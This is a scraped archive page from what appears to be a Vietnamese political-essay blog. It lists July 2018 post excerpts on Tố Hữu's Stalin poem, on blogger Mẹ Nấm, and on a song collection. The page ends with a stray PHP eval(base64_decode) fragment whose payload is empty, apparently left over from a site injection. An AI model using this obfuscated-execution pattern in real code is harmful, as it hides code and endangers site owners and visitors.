Archive for July, 2018

LIÊN XÔ CỦA TỐ HỮU VÀ VI THÙY LINH

LIÊN XÔ CỦA TỐ HỮU VÀ VI THÙY LINH

Tháng 5, 1953, Tố Hữu viết bài thơ Đời Đời Nhớ Ông trong đó có nhiều câu gần như ai cũng thuộc, không phải thuộc để ngâm nga khi cao hứng nhưng để khinh bỉ một con người đồng nghĩa với vong thân, nô lệ.Stalin! Stalin! Yêu biết mấy, n

07.6.2018 | Tiểu Luận- Chính Luận |

No Comments

[English] NGUYỄN NGỌC NHƯ QUỲNH, Who Will Speak On Your Behalf ?

[English] NGUYỄN NGỌC NHƯ QUỲNH, Who Will Speak On Your Behalf ?

NGUYỄN NGỌC NHƯ QUỲNH, Who Will Speak On Your Behalf ? vương-thanh’s translation of the essay NGUYỄN NGỌC NHƯ QUỲNH, AI SẼ NÓI THAY EM” by Trần Trung Đạo “Who will speak if you do not?” was what Nguyễn Ngọc Như Quỳnh, also known as Blogger Mẹ Nấm, used to

07.2.2018 | Tiểu Luận- Chính Luận |

No Comments

[Giải trí] CD Quê Hương & Tình Yêu

[Giải trí] CD Quê Hương & Tình Yêu

Những bài hát về Quê Hương và Tình Yêu do Trần Trung Đạo hát và upload ở soundcloud. https://soundcloud.com/vienkhach10/sets/t-nh-qu-h-ng

07.1.2018 | Trần Trung Đạo hát |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>